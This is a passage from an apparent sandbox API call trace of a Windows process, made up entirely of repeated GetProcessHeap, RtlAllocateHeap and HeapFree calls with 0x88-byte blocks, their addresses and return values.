Size=0x88) returned 0x6826388 [0130.872] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.873] GetProcessHeap () returned 0xe30000 [0130.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.873] GetProcessHeap () returned 0xe30000 [0130.874] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.874] GetProcessHeap () returned 0xe30000 [0130.874] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0130.874] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.875] GetProcessHeap () returned 0xe30000 [0130.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.876] GetProcessHeap () returned 0xe30000 [0130.876] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.876] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.877] GetProcessHeap () returned 0xe30000 [0130.877] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.878] GetProcessHeap () returned 0xe30000 [0130.878] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.878] GetProcessHeap () returned 0xe30000 [0130.878] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.878] GetProcessHeap () returned 0xe30000 [0130.878] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.880] GetProcessHeap () returned 0xe30000 [0130.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.881] GetProcessHeap () returned 0xe30000 [0130.881] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.882] GetProcessHeap () returned 0xe30000 [0130.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.883] GetProcessHeap () returned 0xe30000 [0130.883] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.884] GetProcessHeap () returned 0xe30000 [0130.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.884] GetProcessHeap () returned 